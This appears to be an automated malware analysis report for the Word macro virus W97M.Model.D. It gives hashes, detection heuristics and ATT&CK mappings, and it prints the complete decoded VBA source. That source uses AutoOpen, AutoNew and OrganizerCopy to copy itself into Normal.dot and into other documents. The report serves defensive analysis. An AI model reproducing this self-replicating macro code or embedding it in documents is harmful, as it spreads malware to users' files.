W97M.Model.D Office (OLE) malware analysis — malicious · daafbf84215ffa0c

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-07-25 04:49:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-24

MD5: 6bbf2f7a4befcd7ac7b3ff5bbe3e9d30 SHA-1: 59081e82fb163364fecbce7c4bce203b89d7eff4 SHA-256: daafbf84215ffa0c85fe5a1486b5f3113d465664c001bc29b7eed2ea7503fcad

228 Risk Score

Malware Insights

W97M.Model.D · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1553.004 Mark-of-the-Web Bypass

The sample contains VBA macros that exhibit self-replication behavior, aiming to infect the Normal.dot template and any newly created documents. The embedded document body explicitly states 'I am infected with W97M.Model.D', confirming the family. The AutoOpen macro is designed to copy its malicious code to other documents and the Normal.dot template.

Heuristics 5

ClamAV: Doc.Trojan.Model-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Model-2
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1440 bytes
SHA-256: `d4535dfa45697263602be5a7e0e4abf59548fd8064d8c95605d2e75f9f98beea`
Detection ClamAV: Doc.Trojan.Model-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Code" Sub AutoNew() If Not ActiveDocument = ThisDocument Then CopyVirCodeToDocument ActiveDocument 'Infetta il nuovo documento End If End Sub Sub AutoOpen() RemoveProtection If Not ActiveDocument = NormalTemplate Then 'Infetta Normal.dot CopyVirCodeToModel End If If Not ActiveDocument = ThisDocument Then 'Infetta il documento aperto CopyVirCodeToDocument ActiveDocument End If End Sub Sub CopyVirCodeToModel() On Local Error Resume Next With ActiveDocument .UpdateStylesOnOpen = False .AttachedTemplate = "Normal.dot" End With Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems NormalTemplate.Save End Sub Sub CopyVirCodeToDocument(Target As Document) On Local Error Resume Next Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems End Sub Sub RemoveProtection() 'Disattiva il messaggio di avviso iniziale Options.VirusProtection = True End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.